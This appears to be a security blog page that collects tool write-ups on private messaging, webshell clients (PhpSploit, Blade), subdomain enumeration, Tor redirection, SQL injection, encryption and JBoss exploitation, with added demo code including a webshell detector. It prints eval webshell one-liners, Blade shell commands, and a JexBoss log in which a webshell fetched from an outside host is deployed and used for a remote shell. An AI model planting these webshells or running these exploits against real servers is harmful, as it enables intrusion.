SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT


Wednesday, January 6, 2016

Vuvuzela - Private Messaging System That Hides Metadata


Vuvuzela is a messaging system that protects the privacy of message contents and message metadata. Users communicating through Vuvuzela do not reveal who they are talking to, even in the presence of powerful nation-state adversaries. Our SOSP 2015 paper explains the system, its threat model, performance, limitations, and more. Our SOSP 2015 slides give a more graphical overview of the system.

Vuvuzela is the first system that provides strong metadata privacy while scaling to millions of users. Previous systems that hide metadata using Tor (such as Pond) are prone to traffic analysis attacks. Systems that encrypt metadata using techniques like DC-nets and PIR don't scale beyond thousands of users.

Vuvuzela uses efficient cryptography (NaCl) to hide as much metadata as possible and adds noise to metadata that can't be encrypted efficiently. This approach provides less privacy than encrypting all of the metadata, but it enables Vuvuzela to support millions of users. Nonetheless, Vuvuzela adds enough noise to thwart adversaries like the NSA and guarantees differential privacy for users' metadata.

Screenshots

A conversation in the Vuvuzela client

In practice, the message latency would be around 20s to 40s, depending on security parameters and the number of users connected to the system.

Noise generated by the Vuvuzela servers

Vuvuzela is unable to encrypt two kinds of metadata: the number of idle users (connected users without a conversation partner) and the number of active users (users engaged in a conversation). Without noise, a sophisticated adversary could use this metadata to learn who is talking to whom. However, the Vuvuzela servers generate noise that perturbs this metadata so that it is difficult to exploit.
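As an added illustration (not Vuvuzela's own code) of how noise on the idle and active counts limits what an observer can learn: each server adds one Laplace draw to each count, and the worst-case change in an observer's likelihood between "this pair is talking" and "it is not" is bounded by epsilon. The Laplace distribution, the three-server chain adding independent draws, and calibrating a single honest server's draw to the full epsilon are assumptions of this example, not details taken from the page.

```python
import math
import random

# Added illustration of the noise idea above; not Vuvuzela's own code. Assumed,
# not taken from the page: Laplace-distributed noise, one independent draw per
# server in the chain, and one honest server's draw calibrated to give epsilon.

SENSITIVITY = 2  # a new conversation moves two users from "idle" to "active"


def laplace_sample(scale: float, rng: random.Random) -> float:
    """Draw from Laplace(0, scale) by inverse-transform sampling."""
    u = max(rng.random() - 0.5, -0.5 + 1e-15)  # keep the log() argument > 0
    return -scale * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))


def laplace_log_density(x: float, scale: float) -> float:
    return -abs(x) / scale - math.log(2.0 * scale)


def noise_scale(epsilon: float) -> float:
    """Laplace scale at which a change of SENSITIVITY costs at most epsilon."""
    return SENSITIVITY / epsilon


def noisy_round_counts(idle: int, active: int, epsilon: float,
                       rng: random.Random = None, servers: int = 3) -> tuple:
    """What an observer of the whole chain sees for one round: the true
    idle/active counts plus one Laplace draw per server on each count."""
    rng = rng or random.Random()
    scale = noise_scale(epsilon)
    noisy_idle, noisy_active = float(idle), float(active)
    for _ in range(servers):
        noisy_idle += laplace_sample(scale, rng)
        noisy_active += laplace_sample(scale, rng)
    return noisy_idle, noisy_active


def worst_case_privacy_loss(count_a: int, count_b: int, epsilon: float,
                            lo: int = -100, hi: int = 300) -> float:
    """Largest |log P(obs | count_a) - log P(obs | count_b)| over integer
    observations in [lo, hi) when a single honest server's noise is applied.
    For |count_a - count_b| <= SENSITIVITY the result never exceeds epsilon:
    that is the differential-privacy bound the noise is calibrated to."""
    scale = noise_scale(epsilon)
    return max(abs(laplace_log_density(obs - count_a, scale)
                   - laplace_log_density(obs - count_b, scale))
               for obs in range(lo, hi))


def mean_observed_active(active: int, epsilon: float, rounds: int,
                         seed: int = 1) -> float:
    """Average noisy active count over many rounds. The noise is zero-mean, so
    the long-run average converges to the truth; a single round does not."""
    rng = random.Random(seed)
    total = sum(noisy_round_counts(0, active, epsilon, rng)[1]
                for _ in range(rounds))
    return total / rounds


if __name__ == "__main__":
    print("one round:", noisy_round_counts(1000, 240, epsilon=1.0))
    print("worst-case privacy loss:", worst_case_privacy_loss(240, 242, 1.0))
```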

Usage
Follow these steps to run the Vuvuzela system locally using the provided sample configs.
  1. Install Vuvuzela (assuming GOPATH=~/go; requires Go 1.4 or later):
    $ go get github.com/davidlazar/vuvuzela/...
    The remaining steps assume PATH contains ~/go/bin and that the current working directory is ~/go/src/github.com/davidlazar/vuvuzela.
  2. Start the last Vuvuzela server:
    $ vuvuzela-server -conf confs/local-last.conf
  3. Start the middle server (in a new shell):
    $ vuvuzela-server -conf confs/local-middle.conf
  4. Start the first server (in a new shell):
    $ vuvuzela-server -conf confs/local-first.conf
  5. Start the entry server (in a new shell):
    $ vuvuzela-entry-server -wait 1s
  6. Run the Vuvuzela client:
    $ vuvuzela-client -conf confs/alice.conf
The client supports these commands:
  • /dial <user> to dial another user
  • /talk <user> to start a conversation
  • /talk <yourself> to end a conversation

Deployment considerations
This Vuvuzela implementation is not ready for wide deployment. In particular, we haven't yet implemented these crucial components:
  • Public Key Infrastructure: Vuvuzela assumes the existence of a PKI in which users can privately learn each other's public keys. This implementation uses pki.conf as a placeholder until we integrate a real PKI.
  • CDN to distribute dialing dead drops: Vuvuzela's dialing protocol (used to initiate conversations) uses a lot of server bandwidth. To make dialing practical, Vuvuzela should use a CDN or BitTorrent to distribute the dialing dead drops.
There is a lot more interesting work to do. See the issue tracker for more information.



Phpsploit - Stealth Post-Exploitation Framework



PhpSploit is a remote control framework, aiming to provide a stealthy interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable of maintaining access to a compromised web server for privilege escalation purposes.

Overview

The obfuscated communication is accomplished using HTTP headers in standard client requests and the web server's corresponding responses, tunneled through a tiny polymorphic backdoor:
<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>

Features

  • Efficient: More than 20 plugins to automate post-exploitation tasks
    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth: The framework is made by paranoids, for paranoids
    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient: A robust interface with many crucial features
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature, with persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms

  • GNU/Linux
  • Mac OS X
  • Windows (experimental)



Blade - A Webshell Connection Tool With Customized WAF Bypass Payloads



Blade is a console-based webshell connection tool, currently under development, that aims to be a replacement for Chooper (中国菜刀). Chooper is a very cool webshell client that supports a wide variety of server-side scripts, but it only runs on the Windows operating system; that is the motivation for creating another "Chooper" that supports Windows, Linux and Mac OS X. Blade is written in Python, so users can modify the webshell connection payloads, which lets Blade bypass some specific WAFs that Chooper cannot.

Major functions
Manage a web server with only a one-line script on it, such as: <?php @eval($_REQUEST["cmd"]); ?>
PHP, ASP, ASPX & JSP supported.
Terminal console provided.
File management & database management.

Features
Cross-platform (Python needed)
Customizable WAF bypass payloads
Compatible with Chooper's server side scripts

Server side scripts examples
PHP: <?php @eval($_REQUEST["cmd"]); ?>
ASP: <%eval request("cmd")%>
ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
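From the defender's side, the one-liners above (Blade's server-side scripts and PhpSploit's header-fed backdoor earlier on this page) are the artefacts to hunt for on a web root. The following is an added example, not part of PhpSploit or Blade, that scans files for "eval on attacker-controlled input" stagers; the sample files are constructed for the demonstration.

```python
import re

# Added example, not part of PhpSploit or Blade: a static scan of web-root files for
# the one-line "eval on attacker-controlled input" stagers quoted on this page (PHP
# $_REQUEST / $_SERVER HTTP_ headers, ASP eval request(), ASPX eval(..., "unsafe")).
# The sample files below are constructed for this demonstration.

# (label, compiled pattern). Case-insensitive; tolerate the @ suppressor and spacing.
RULES = [
    ("php-eval-request",
     re.compile(r"@?\s*eval\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\[", re.I)),
    ("php-eval-http-header",   # PhpSploit-style: the payload rides in a request header
     re.compile(r"@?\s*eval\s*\(\s*\$_SERVER\s*\[\s*['\"]HTTP_", re.I)),
    ("asp-eval-request",
     re.compile(r"<%\s*(?:eval|execute)\s*\(?\s*request\s*\(", re.I)),
    ("aspx-eval-unsafe",
     re.compile(r"eval\s*\(\s*Request\.Item\s*\[.*?\]\s*,\s*['\"]unsafe['\"]", re.I)),
]


def scan_source(path: str, text: str) -> list:
    """Return (path, line_number, rule_label) for every line matching a rule."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in RULES:
            if pattern.search(line):
                hits.append((path, lineno, label))
    return hits


def scan_tree(files: dict) -> list:
    """files maps path -> contents (in practice, read from the web root)."""
    hits = []
    for path, text in files.items():
        hits.extend(scan_source(path, text))
    return hits


# Constructed sample web root: the four stagers from this page plus a benign file.
SAMPLE_FILES = {
    "htdocs/shell.php": '<?php @eval($_REQUEST["cmd"]); ?>\n',
    "htdocs/cache.php": "<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>\n",
    "htdocs/cmd.asp": '<%eval request("cmd")%>\n',
    "htdocs/cmd.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>\n',
    "htdocs/index.php": "<?php\n$page = $_GET['page'] ?? 'home';\necho htmlspecialchars($page);\n",
}

if __name__ == "__main__":
    for path, lineno, label in scan_tree(SAMPLE_FILES):
        print(f"{path}:{lineno}: {label}")
```

Both tools advertise polymorphic or customisable payloads, so real stagers vary the header name and wrap the call in string or encoding tricks; treat these patterns as a starting signature set for file-integrity monitoring, not a complete detector.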

Usage
Get a shell:
python blade.py -u http://localhost/shell.php -s php -p cmd --shell
Download a file:
python blade.py -u http://localhost/shell.php -s php -p cmd --pull remote_path local_path
Upload a file:
python blade.py -u http://localhost/shell.php -s php -p cmd --push local_path remote_path

Current issues
Server-side script support is not complete; currently only PHP and ASP are supported.
The database management function is not complete, so it cannot connect to databases.



Sublist3R - Fast Subdomains Enumeration Tool For Penetration Testers



Sublist3r is a Python tool designed to enumerate subdomains of websites using search engines. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r currently supports the following search engines: Google, Yahoo, Bing, Baidu, and Ask. More search engines may be added in the future. Sublist3r also gathers subdomains using Netcraft and DNSdumpster.

subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.

Installation
git clone https://github.com/aboul3la/Sublist3r.git

Recommended Python version:
The recommended Python version is 2.7.x on any platform.
Other Python versions may not be supported at the moment.

Dependencies:

Requests library ( http://docs.python-requests.org/en/latest/ )
  • Install for Ubuntu/Debian:
sudo apt-get install python-requests
  • Install for Centos/Redhat:
sudo yum install python-requests
  • Install using pip:
sudo pip install requests

dnspython library ( http://www.dnspython.org/ )
  • Install for Ubuntu/Debian:
sudo apt-get install python-dnspython
  • Install using pip:
sudo pip install dnspython

argparse library
  • Install for Ubuntu/Debian:
sudo apt-get install python-argparse
  • Install for Centos/Redhat:
sudo yum install python-argparse
  • Install using pip:
sudo pip install argparse

Usage
Short Form   Long Form      Description
-d           --domain       Domain name to enumerate subdomains of
-b           --bruteforce   Enable the subbrute bruteforce module
-v           --verbose      Enable verbosity and display results in real time
-t           --threads      Number of threads to use for subbrute bruteforce
-o           --output       Save the results to a text file
-h           --help         Show the help message and exit

Examples
  • To list all the basic options and switches, use the -h switch:
python sublist3r.py -h
  • To enumerate subdomains of a specific domain:
python sublist3r.py -d example.com
  • To enumerate subdomains of a specific domain and show results in real time:
python sublist3r.py -v -d example.com
  • To enumerate subdomains and use the subbrute bruteforce module:
python sublist3r.py -b -d example.com



Nipe - Script To Redirect All Traffic From The Machine To The Tor Network


Script to redirect all the traffic from the machine to the Tor network.
[+] AUTHOR:   Vinicius Gouvea
[+] EMAIL:    vini@inploit.com
[+] BLOG:     https://medium.com/viniciusgouvea
[+] GITHUB:   https://github.com/HeitorG
[+] FACEBOOK: https://fb.com/viniciushgouvea



Installing:
git clone https://github.com/HeitorG/nipe
cd nipe
cpan install strict warnings Switch

Commands:
COMMAND   FUNCTION
install   Install Nipe
start     Start Nipe
stop      Stop Nipe


Tested on:
  • Ubuntu 14.10 and 15.04
  • BunsenLabs Hydrogen
  • Debian Jessie 8.1 and Wheezy 7.9
  • Lubuntu 15.04
  • Xubuntu 15.04
  • LionSec 3.0


jSQL Injection v0.73 - Java Tool For Automatic SQL Database Injection.



jSQL Injection is a lightweight application used to find database information from a remote server.

jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

jSQL is part of Kali Linux, the official successor to the BackTrack penetration testing distribution.

jSQL is also included in Black Hat Sec, ArchAssault Project, BlackArch Linux and Cyborg Hawk Linux.

Change log

Coming... i18n Arabic, Russian and Chinese integration; next DB engines: SQLite, Access, MSDE...
v0.73 Authentication: Basic, Digest, Negotiate, NTLM and Kerberos; database type selection
v0.7 Batch scan, Github issue reporter, support for 16 db engines, optimized GUI
alpha-v0.6 Speed x 2 (no more hex encoding), 10 db vendors supported: MySQL Oracle SQLServer PostgreSQL DB2 Firebird Informix Ingres MaxDb Sybase. JUnit tests, log4j, i18n integration and more.
0.5 SQL shell, Uploader.
0.4 Admin page search, Brute force (md5 mysql...), Decoder (decode encode base64 hex md5...).
0.3 Distant file reader, Webshell drop, Terminal for webshell commands, Configuration backup, Update checker.
0.2 Time based algorithm, Multi-thread control (start pause resume stop), Shows URL calls.



CenoCipher - Easy-To-Use, End-To-End Encrypted Communications Tool



CenoCipher is a free, open-source, easy-to-use tool for exchanging secure encrypted communications over the internet. It uses strong cryptography to convert messages and files into encrypted cipher-data, which can then be sent to the recipient via regular email or any other channel available, such as instant messaging or shared cloud storage.

Features at a glance

  • Simple for anyone to use. Just type a message, click Encrypt, and go
  • Handles messages and file attachments together easily
  • End-to-end encryption, performed entirely on the user's machine
  • No dependence on any specific intermediary channel. Works with any communication method available
  • Uses three strong cryptographic algorithms in combination to triple-protect data
  • Optional steganography feature for embedding encrypted data within a Jpeg image
  • No installation needed - fully portable application can be run from anywhere
  • Unencrypted data is never written to disk - unless requested by the user
  • Multiple input/output modes for convenient operation

Technical details

  • Open source, written in C++
  • AES/Rijndael, Twofish and Serpent ciphers (256-bit keysize variants), cascaded together in CTR mode for triple-encryption of messages and files
  • HMAC-SHA-256 for construction of message authentication code
  • PBKDF2-HMAC-SHA256 for derivation of separate AES, Twofish and Serpent keys from user-chosen passphrase
  • Cryptographically safe pseudo-random number generator ISAAC for production of Initialization Vectors (AES/Twofish/Serpent) and Salts (PBKDF2)
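To make the listed construction concrete, here is an added example (not CenoCipher's code) that derives separate per-layer keys plus an HMAC key from one PBKDF2-HMAC-SHA256 call, applies three CTR layers with distinct IVs, and authenticates with HMAC-SHA-256. Because the Python standard library has no AES, Twofish or Serpent, each layer's block function is stood in for by a truncated HMAC-SHA-256 PRF, which is all CTR mode requires; the four-slice key split, the encrypt-then-MAC layout and the field lengths are assumptions of this example, not CenoCipher's actual format.

```python
import hashlib
import hmac
import os

# Added illustration of the construction listed above (PBKDF2-HMAC-SHA256 -> three
# separate cipher keys, three CTR layers, HMAC-SHA-256); not CenoCipher's code.
# The stdlib has no AES/Twofish/Serpent, so each layer's 128-bit block function is
# stood in for by HMAC-SHA-256 truncated to 16 bytes; CTR mode only needs a keyed
# PRF, so the cascade mechanics are unchanged. Also assumed: the MAC key is a
# fourth PBKDF2 slice, the tag covers salt + IVs + ciphertext, and the salt, IV
# and tag are 16, 16 and 32 bytes.

LAYERS = ("aes", "twofish", "serpent")   # names only; see the stand-in note above
BLOCK = 16


def prf_block(key: bytes, counter_block: bytes) -> bytes:
    return hmac.new(key, counter_block, hashlib.sha256).digest()[:BLOCK]


def ctr_keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Standard CTR keystream: block(key, IV + i) for i = 0, 1, ..."""
    out = bytearray()
    counter = int.from_bytes(iv, "big")
    while len(out) < length:
        out += prf_block(key, (counter % (1 << 128)).to_bytes(BLOCK, "big"))
        counter += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def derive_keys(passphrase: str, salt: bytes, rounds: int) -> dict:
    """One PBKDF2 call with dkLen = 4 * 32 yields four independent 256-bit keys:
    one per cipher layer plus the HMAC key, so no key is reused across layers."""
    dk = hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, rounds, dklen=32 * 4)
    return {name: dk[i * 32:(i + 1) * 32] for i, name in enumerate(LAYERS + ("mac",))}


def encrypt(passphrase: str, plaintext: bytes, rounds: int = 100_000,
            salt: bytes = None, ivs: list = None) -> bytes:
    salt = salt or os.urandom(16)
    ivs = ivs or [os.urandom(BLOCK) for _ in LAYERS]   # a distinct IV per layer
    keys = derive_keys(passphrase, salt, rounds)
    ct = plaintext
    for name, iv in zip(LAYERS, ivs):                  # cascade: layer over layer
        ct = xor_bytes(ct, ctr_keystream(keys[name], iv, len(ct)))
    header = salt + b"".join(ivs)
    tag = hmac.new(keys["mac"], header + ct, hashlib.sha256).digest()
    return header + ct + tag                           # encrypt-then-MAC


def decrypt(passphrase: str, blob: bytes, rounds: int = 100_000) -> bytes:
    header_len = 16 + BLOCK * len(LAYERS)
    header, ct, tag = blob[:header_len], blob[header_len:-32], blob[-32:]
    salt = header[:16]
    ivs = [header[16 + i * BLOCK:16 + (i + 1) * BLOCK] for i in range(len(LAYERS))]
    keys = derive_keys(passphrase, salt, rounds)
    expected = hmac.new(keys["mac"], header + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):         # verify before touching ct
        raise ValueError("authentication failed: wrong passphrase or tampered data")
    pt = ct
    for name, iv in zip(LAYERS, ivs):                  # CTR is symmetric: XOR again
        pt = xor_bytes(pt, ctr_keystream(keys[name], iv, len(pt)))
    return pt
```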

Version History (Change Log)

Version 4.0 (December 05, 2015)

  • Drastically overhauled and streamlined interface
  • Added multiple input/output modes for cipher-data
  • Added user control over unencrypted disk writes
  • Added auto-decrypt and open-with support
  • Added more entropy to Salt/IV generation

Version 3.0 (June 29, 2015)

  • Added Serpent algorithm for cascaded triple-encryption
  • Added steganography option for concealing data within Jpeg
  • Added conversation mode for convenience
  • Improved header obfuscation for higher security
  • Increased entropy in generation of separate salt/IVs used by ciphers
  • Many other enhancements under the hood

Version 2.1 (December 6, 2014)

  • Change cascaded encryption cipher modes from CBC to CTR for extra security
  • Improve PBKDF2 rounds determination and conveyance format
  • Fix minor bug related to Windows DPI font scaling
  • Fix minor bug affecting received filenames when saved by user

Version 2.0 (November 26, 2014)

  • Initial open-source release
  • Many enhancements to encryption algorithms and hash functions

Version 1.0 (June 10, 2014)

  • Original program release (closed source / beta)


JexBoss - Jboss Verify And Exploitation Tool


JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.

Requirements

  • Python <= 2.7.x

Installation

To install the latest version of JexBoss, use the following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py

Features

The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
  • /jmx-console
    • tested and working in JBoss versions 4, 5 and 6
  • /web-console/Invoker
    • tested and working in JBoss version 4
  • /invoker/JMXInvokerServlet
    • tested and working in JBoss versions 4 and 5

Usage example

  • Check the file "demo.png"
$ git clone https://github.com/joaomatosf/jexboss.git
$ cd jexboss
$ python jexboss.py https://site-teste.com

* --- JexBoss: Jboss verify and EXploitation Tool --- *
| |
| @author: João Filho Matos Figueiredo |
| @contact: joaomatosf@gmail.com |
| |
| @update: https://github.com/joaomatosf/jexboss |
#______________________________________________________#


** Checking Host: https://site-teste.com **

* Checking web-console: [ OK ]
* Checking jmx-console: [ VULNERABLE ]
* Checking JMXInvokerServlet: [ VULNERABLE ]


* Do you want to try to run an automated exploitation via "jmx-console" ?
This operation will provide a simple command shell to execute commands on the server..
Continue only if you have permission!
yes/NO ? yes

* Sending exploit code to https://site-teste.com. Wait...


* Info: This exploit will force the server to deploy the webshell
available on: http://www.joaomatosf.com/rnp/jbossass.war
* Successfully deployed code! Starting command shell, wait...

* - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *

* https://site-teste.com:

Linux fwgw 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9 21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

CentOS release 6.5 (Final)

uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0

[Type commands or "exit" to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin

[Type commands or "exit" to finish]
Shell> hostname
fwgw

[Type commands or "exit" to finish]
Shell> ls -all /tmp
total 35436
drwxrwxrwt. 4 root root 4096 Nov 24 16:36 .
dr-xr-xr-x. 22 root root 4096 Nov 23 03:26 ..
-rw-r--r--. 1 root root 34630995 Out 15 18:07 snortrules-snapshot-2962.tar.gz
-rw-r--r--. 1 root root 32 Out 16 14:51 snortrules-snapshot-2962.tar.gz.md5
-rw-------. 1 root root 0 Set 20 16:45 yum.log
-rw-------. 1 root root 2743 Set 20 17:18 yum_save_tx-2014-09-20-17-18nQiKVo.yumtx
-rw-------. 1 root root 1014 Out 6 00:33 yum_save_tx-2014-10-06-00-33vig5iT.yumtx
-rw-------. 1 root root 543 Out 6 02:14 yum_save_tx-2014-10-06-02-143CcA5k.yumtx
-rw-------. 1 root root 18568 Out 14 03:04 yum_save_tx-2014-10-14-03-04Q9ywQt.yumtx
-rw-------. 1 root root 315 Out 15 16:00 yum_save_tx-2014-10-15-16-004hKzCF.yumtx

[Type commands or "exit" to finish]
Shell>



Faraday 1.0.16 - Collaborative Penetration Test and Vulnerability Management Platform



Faraday introduces a new concept: IPE (Integrated Penetration-Test Environment), a multiuser penetration test IDE designed for the distribution, indexation and analysis of the data generated during a security audit.

This version comes with major changes to our Web UI, including the ability to mark vulnerabilities as false positives. If you have a Pro or Corp license you can now create an Executive Report using only confirmed vulnerabilities, saving you even more time.

A brand new feature in v1.0.16 is the ability to group vulnerabilities by any field in our Status Report view. Combine it with bulk edit to manage your findings faster than ever!

This release also includes several new features developed entirely by our community.


Changes:

* Added group vulnerabilities by any field in our Status Report
* Added port to Service type target in new vuln modal
* Filter false-positives in Dashboard, Status Report and Executive Report (Pro&Corp)
  Screenshot: Filter in Status Report view
* Added Wiki information about running Faraday without configuring CouchDB: https://github.com/infobyte/faraday/wiki/APIs
* Added parametrization for port configuration on APIs
* Added scripts to:
    - get all IPs from targets that have no services (/bin/getAllIpsNotServices.py)
    - get all IP addresses that have a defined open port (/bin/getAllbySrv.py) and get all IPs from targets without services (/bin/delAllVulnsWith.py)
      Note that both of these scripts hold a variable that you can modify to alter their behaviour: /bin/getAllbySrv.py has a port variable set to 8080 by default, and /bin/delAllVulnsWith.py does the same with a RegExp.
* Added three Plugins:
    - Immunity Canvas
      Screenshot: Canvas configuration
    - Dig
    - Traceroute
* Refactor Plugin Base to update active WS name in var
* Refactor Plugins to use current WS in temp filename under $HOME/.faraday/data. Affected Plugins:
    - amap
    - dnsmap
    - nmap
    - sslcheck
    - wcscan
    - webfuzzer
    - nikto

Bug fixes:
* When the last workspace was null Faraday wouldn't start
* CSV export/import in QT
* Fixed bug that prevented the use of "reports" and "cwe" strings in Workspace names
* Unicode support in Nexpose-full Plugin
* Fixed bug get_installed_distributions from handler exceptions
* Fixed bug in first run of Faraday with log path and API errors


Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community